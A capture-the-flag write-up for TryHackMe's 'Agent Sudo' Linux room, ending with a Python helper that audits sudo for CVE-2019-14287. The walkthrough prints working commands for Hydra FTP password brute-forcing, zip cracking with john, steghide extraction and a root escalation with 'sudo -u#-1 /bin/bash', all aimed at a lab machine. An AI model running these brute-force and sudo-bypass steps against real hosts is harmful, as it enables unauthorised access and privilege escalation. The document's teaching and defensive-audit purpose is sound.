Platform: TryHackMe
OS: Linux
Difficulty: Easy
Tags: web user-agent ftp hydra steganography sudo cve linux
Date: 2026-05
Linux machine where the web server responds differently based on the User-Agent header. Fuzzing the User-Agent reveals a username and hints towards FTP credentials. Brute-forced FTP with Hydra, found images containing hidden data via steganography, recovered a password, SSH'd in as james, and escalated to root via CVE-2019-14287 — a sudo version vulnerability allowing UID bypass.
```bash
nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>
```
```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1
80/tcp open  http    Apache httpd 2.4.29
```
The landing page says to use your "codename" as the User-Agent. Tried letters A-Z:
```bash
curl -A "C" http://<TARGET_IP>/
```
```
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff.
```
Username discovered: chris. Another agent mentioned: J (james).
```bash
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<TARGET_IP>
```
```
[21][ftp] host: <TARGET_IP>   login: chris   password: crystal
```
```bash
ftp <TARGET_IP>
# Login: chris / crystal
ls
```
```
To_agentJ.txt
cute-alien.jpg
cutie.png
```
```bash
get To_agentJ.txt
get cute-alien.jpg
get cutie.png
```
To_agentJ.txt mentions a fake/real picture with hidden data and a password that is "stored in the fake one."
cutie.png — checked for hidden files with binwalk:
```bash
binwalk cutie.png
```
```
DECIMAL       HEXADECIMAL     DESCRIPTION
0             0x0             PNG image
34562         0x8702          Zip archive data
```
```bash
binwalk -e cutie.png
```
Extracted a zip, which is password protected. Cracked with john:
```bash
zip2john 8702.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
```
```
alien            (8702.zip)
```
Inside the zip: To_agentR.txt — message from Agent R, mentions the password is "Area51".
cute-alien.jpg — checked with steghide using the extracted password:
```bash
steghide extract -sf cute-alien.jpg
# Passphrase: Area51
```
The extracted file is a message from james:
```
Hey buddy, its james here...
username: james
password: hackerrules!
```
```bash
ssh james@<TARGET_IP>
cat user_flag.txt
```
There's also an image Alien_autospy.jpg in James's home:
```bash
scp james@<TARGET_IP>:Alien_autospy.jpg .
```
Reverse image search identifies it as the Roswell alien autopsy photo — the answer to a room question.
```bash
sudo -l
```
```
User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
```
The (ALL, !root) looks like it restricts root access — but this is vulnerable to CVE-2019-14287.
In sudo versions < 1.8.28, specifying UID -1 or 4294967295 bypasses the !root restriction:
```bash
sudo -u#-1 /bin/bash
```
```
root@agent-sudo:~# whoami
root
```
```bash
cat /root/root.txt
```

- HTTP User-Agent headers can control application behaviour — always fuzz them
- Steganography is common in easy/medium CTFs — check all images with binwalk and steghide
- Extracting zips often needs binwalk -e, then zip2john + john for password cracking
- (ALL, !root) in sudoers looks restrictive but on sudo < 1.8.28 it is bypassable via CVE-2019-14287
- Chain of clues: User-Agent → FTP creds → stego → SSH creds → sudo CVE
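An added audit helper, not part of the room or this writeup, that checks for the condition exploited above from the defender's side: it parses a sudo version string and the rules from `sudo -l` or sudoers, and reports Runas lists of the `(ALL, !root)` form that are bypassable on sudo before 1.8.28 (the fix version from the CVE-2019-14287 advisory). The version and rule strings in the block are constructed samples mirroring this box.

```python
import re

# CVE-2019-14287 was fixed in sudo 1.8.28; earlier builds resolve the
# uid -1 / 4294967295 to root even when the Runas list says "!root".
FIXED_VERSION = (1, 8, 28, 0)


def parse_sudo_version(text: str) -> tuple:
    """Turn 'Sudo version 1.8.21p2' (or just '1.8.21p2') into (1, 8, 21, 2)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised sudo version string: {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def has_bypassable_runas(rule: str) -> bool:
    """True for a sudoers or `sudo -l` rule whose Runas user list is ALL
    with root excluded by '!' (e.g. '(ALL, !root) /bin/bash' or
    'james ALL=(ALL, !root) /bin/bash'). Only the ALL + !root combination
    matters: a list of named users never admits uid -1 in the first place."""
    m = re.search(r"\(([^)]*)\)", rule)
    if not m:
        return False
    runas_users = m.group(1).split(":")[0]          # ignore any ':group' part
    entries = {e.strip() for e in runas_users.split(",")}
    return "ALL" in entries and bool(entries & {"!root", "!#0"})


def audit(version_text: str, rules: list) -> list:
    """Return the rules that are still exploitable on this sudo build
    (empty list: sudo is patched, or no such rule exists)."""
    if parse_sudo_version(version_text) >= FIXED_VERSION:
        return []
    return [r for r in rules if has_bypassable_runas(r)]


if __name__ == "__main__":
    # Constructed samples: an unpatched sudo and the rule seen in `sudo -l` above.
    sample_version = "Sudo version 1.8.21p2"
    sample_rules = ["(ALL, !root) /bin/bash", "(ALL) NOPASSWD: /usr/bin/less"]
    for rule in audit(sample_version, sample_rules):
        print(f"bypassable on {sample_version}: {rule}")
```

On a live host, feed it the first line of `sudo -V` and the rule lines from `sudo -l`; a non-empty result means either upgrade sudo or replace the `!root` exclusion with an explicit allow-list of Runas users.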